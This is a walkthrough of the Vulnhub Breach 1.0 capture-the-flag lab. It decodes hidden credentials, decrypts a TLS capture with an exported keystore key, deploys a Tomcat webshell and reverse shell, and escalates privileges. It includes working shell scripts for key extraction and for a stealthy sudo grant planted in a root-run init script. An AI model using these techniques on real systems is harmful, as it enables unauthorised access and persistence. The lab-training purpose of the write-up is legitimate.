Vulnhub – Breach 1.0 walkthrough

First, let's see what we've got. I did a basic nmap scan:

[screenshot: nmap scan]

It seems that an active IPS/IDS is present. I tried different nmap evasion techniques, but those didn't work; nmap reported all ports as filtered. I checked manually whether port 80 was open, then fired up Nikto; nothing interesting.

[screenshot]

Let's look at those images. Voilà, a little hint:

[screenshot: hint1]

Okay, let's check the source code. I found an interesting line:

<!------Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->

It looks like a hash or an encoded string. I don't know why, but my first thought was that it was a base64-encoded string. I had to decode it twice, and that gave me a username:password pair.

[screenshot: decoding the base64 string]
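As an added example that is not part of the original post, the shell below does the decoding generically: it pulls every base64-looking token out of a line of page source (the HTML comment above, copied here as constructed sample input) and keeps decoding while the result still looks like base64 and is printable, so it also handles strings that are wrapped more than twice.

```shell
#!/bin/sh
# Added example (not from the walkthrough): find base64-looking tokens in page
# source and peel nested base64 layers until the payload stops looking like
# base64. Only standard coreutils are used.

# Constructed sample input: the HTML comment as it appeared in the page source.
HTML_SAMPLE='<!------Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->'

# Print every run of 20+ base64-alphabet characters (optionally padded) on stdin.
find_b64_tokens() {
    grep -oE '[A-Za-z0-9+/]{20,}={0,2}'
}

# Repeatedly base64-decode $1 while the current value is still base64-shaped.
# Stops at the first layer that contains characters outside the base64
# alphabet (':' and '$' in a user:pass string), fails to decode (bad
# length/padding) or decodes to non-printable bytes.
decode_layers() {
    s="$1"
    while printf '%s' "$s" | grep -Eq '^[A-Za-z0-9+/]+=*$'; do
        d=$(printf '%s' "$s" | base64 -d 2>/dev/null) || break
        [ -n "$d" ] || break
        printf '%s' "$d" | LC_ALL=C grep -q '[^[:print:]]' && break
        s="$d"
    done
    printf '%s\n' "$s"
}

# Extract and decode every candidate token in a piece of page source.
peel_page() {
    printf '%s\n' "$1" | find_b64_tokens | while IFS= read -r tok; do
        decode_layers "$tok"
    done
}

# Split a user:pass string into its two halves.
cred_user() { printf '%s\n' "${1%%:*}"; }
cred_pass() { printf '%s\n' "${1#*:}"; }

# Usage: print the decoded credential pair hidden in the sample comment.
peel_page "$HTML_SAMPLE"
```

The loop deliberately stops on the first non-base64 layer rather than counting to two; a plaintext that happens to be pure alphanumerics would be decoded once more, and the printable check catches most of that.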

I did some investigation and found a CMS portal running ImpressCMS (by clicking Employee portal on initech.html). Let's see if we can log in with our username/password pair. Login successful, nice. We have 3 messages in the inbox. Let's see the first:

[screenshot: keyfile message]

I downloaded the keyfile located at the root of the website and found out that it is a Java keystore file. I read the 2 other messages, but those didn't help me much. My first thought proved right: an active IDS/IPS is present. I searched for exploits related to ImpressCMS, but the one that could have worked was a troll:

[image: troll.gif]

At this point I got stuck a bit. I tried DirBuster, different exploits and XSS vulnerabilities on the CMS site, but nothing. I tried to brute-force the admin account, but no luck. I investigated the other pictures and pages more deeply; nothing interesting. One option was left on the CMS site: check pgibbons' profile. I found something interesting:

Published by Peter Gibbons on 2016/6/4 21:37:05. (0 reads)
Team – I have uploaded a pcap file of our red team’s re-production of the attack. I am not sure what trickery they were using but I cannot read the file. I tried every nmap switch from my C|EH studies and just cannot figure it out. http://192.168.110.140/impresscms/_SSL_test_phase1.pcap They told me the alias, storepassword and keypassword are all set to ‘tomcat’. Is that useful?? Does anyone know what this is? I guess we are securely encrypted now? -Peter p.s. I’m going fishing for the next 2 days and will not have access to email or phone.

I opened the pcap file; it contained data, but I didn't have a private RSA key to decrypt it with. WAIT! I have one! I had to export the RSA private key from .keyfile, and then I was able to look at what the heck happened:

[screenshot: credentials in the decrypted pcap]
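The export is two commands, which the post does not show. As an added example (not the author's commands), the functions below convert the keystore to a PEM private key using the alias and passwords from Peter's post ('tomcat') and then hand the key to tshark to print the decrypted HTTP requests and any Basic credentials; the keystore, key and pcap file names are parameters. The caveat a practitioner should know: this only works because the capture used an RSA key exchange. With an (EC)DHE cipher suite the server's private key decrypts nothing and you would need a pre-master secret log instead.

```shell
#!/bin/sh
# Added example (not from the walkthrough): Java keystore -> PEM private key
# -> decrypted HTTP in tshark. Alias, store password and key password default
# to 'tomcat' as stated in the post; everything else is a parameter.

# jks_to_pem KEYSTORE OUT.pem [ALIAS] [PASSWORD]
# keytool cannot print a private key, so convert JKS -> PKCS#12 first and let
# openssl dump the key unencrypted (-nodes). Returns 1 on any failure.
jks_to_pem() {
    ks="$1"; out="$2"; alias="${3:-tomcat}"; pw="${4:-tomcat}"
    p12="${out%.pem}.p12"
    keytool -importkeystore \
        -srckeystore "$ks" -srcstoretype JKS -srcstorepass "$pw" \
        -srcalias "$alias" -srckeypass "$pw" \
        -destkeystore "$p12" -deststoretype PKCS12 \
        -deststorepass "$pw" -destkeypass "$pw" -noprompt >/dev/null 2>&1 || return 1
    openssl pkcs12 -in "$p12" -passin "pass:$pw" -nocerts -nodes -out "$out" 2>/dev/null || return 1
    rm -f "$p12"
    grep -q 'PRIVATE KEY' "$out"
}

# decrypt_http PCAP KEY.pem
# Registers the RSA key with tshark (Wireshark >= 3.0 syntax; 2.x used
# -o "ssl.keys_list:192.168.110.140,8443,http,KEY.pem") and prints every
# decrypted HTTP request that carried an Authorization header, decoding
# Basic credentials on the fly. '|' is used as the field separator so that
# empty fields do not shift the columns.
decrypt_http() {
    pcap="$1"; key="$2"
    tshark -r "$pcap" -o "uat:rsa_keys:\"$key\",\"\"" \
        -Y 'http.authorization' -T fields -E separator='|' \
        -e http.host -e http.request.method -e http.request.uri -e http.authorization |
    while IFS='|' read -r host method uri auth; do
        case "$auth" in
            Basic\ *) creds=$(printf '%s' "${auth#Basic }" | base64 -d 2>/dev/null) ;;
            *)        creds="$auth" ;;
        esac
        printf '%s %s%s -> %s\n' "$method" "$host" "$uri" "$creds"
    done
}
```

Usage on the box's files would be `jks_to_pem keyfile tomcat.pem && decrypt_http _SSL_test_phase1.pcap tomcat.pem`. Since the Manager is on a non-standard port, the 2.x keys_list form needs the port and protocol spelled out, as in the comment; the 3.x UAT form lets tshark match the key to the server certificate automatically.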

Tomcat Manager is running on port 8443 (https://192.168.110.140:8443/_M@nag3Me/html/; login successful with the credentials from Wireshark). What's more, the Wireshark capture gave us a hint that we can run shell commands with the help of cmd.jsp. But where is it? It had been uploaded, but the resource cannot be found; the author or a system service may have deleted it. A little googling helped me at this point. I can upload any kind of WAR file, and there is a cmd.war file on the internet (Laudanum) that seems to be the same thing. So I uploaded it, searched for netcat and made a reverse shell back to my Kali box.

[screenshot: cmd.war deployed, commands run through cmd.jsp]

[screenshot: netcat reverse shell]

First I tried some Ubuntu 14.04 kernel exploits, but all of them failed. I finally gave up probing exploits; instead I sent the LinEnum privilege-escalation checker to the victim machine and did a quick investigation of what permissions I have.

MySQL login as root was successful without a password. Nice. I found Milton's username and password hash in the database, then tried to crack the password with oclHashcat. It was recovered successfully, and I switched from the tomcat user to milton. Another username and password hash was found, but I couldn't crack this hash within a reasonable time.

[screenshot: mysql]

After changing user from tomcat to milton, I found a "some_script.sh" file with the following content: "Nothing here."

Okay, dig deeper. Really. Nothing in here... After some time I found an init script in the init.d folder (portly.sh). This little script redirects all traffic to the portly scanner. Okay, I will use this script to add milton to sudoers at system startup.

echo 'echo "milton ALL=(ALL) ALL" >> /etc/sudoers' > /etc/init.d/portly.sh
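A safer variant, as an added example rather than the author's command: append a hook to the root-run init script that drops a mode-0440 file into /etc/sudoers.d (honoured by Ubuntu's default #includedir line) instead of truncating /etc/sudoers, and verify the result before rebooting. Paths are parameters so the hook can be rehearsed in a scratch directory; run lint_grant as root to have visudo check the file.

```shell
#!/bin/sh
# Added example (not from the walkthrough): persistence through a root-run
# init script that grants sudo via a /etc/sudoers.d drop-in. Defaults match
# the box; override INIT_SCRIPT and SUDOERS_D to rehearse elsewhere.
INIT_SCRIPT="${INIT_SCRIPT:-/etc/init.d/portly.sh}"
SUDOERS_D="${SUDOERS_D:-/etc/sudoers.d}"

# add_sudo_hook USER -> append to INIT_SCRIPT; the hook runs as root at boot.
# sudo silently ignores drop-ins that are not mode 0440 or whose name
# contains '.' or '~', so the mode is set explicitly.
add_sudo_hook() {
    user="$1"
    cat >> "$INIT_SCRIPT" <<EOF

# grant $user full sudo at boot
printf '%s ALL=(ALL) ALL\\n' '$user' > '$SUDOERS_D/$user'
chmod 0440 '$SUDOERS_D/$user'
EOF
}

# simulate_boot -> run the hooked script the way init would, as a shell script.
simulate_boot() {
    sh "$INIT_SCRIPT"
}

# check_grant USER -> 0 if the drop-in exists, is mode 0440 and holds the grant.
check_grant() {
    f="$SUDOERS_D/$1"
    [ -f "$f" ] || return 1
    [ "$(stat -c '%a' "$f")" = "440" ] || return 1
    grep -q "^$1 ALL=(ALL) ALL$" "$f"
}

# lint_grant USER -> let visudo parse the drop-in and check owner/mode (needs root).
lint_grant() {
    visudo -cf "$SUDOERS_D/$1"
}
```

Appending rather than overwriting keeps the IPS redirect working, so nothing visible changes on the box, and the drop-in can be removed with a single rm when the engagement is over.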

After the system reboot I rebuilt my connections, did a quick sudo su as milton and voilà, I captured the flag.

[screenshot: the flag]
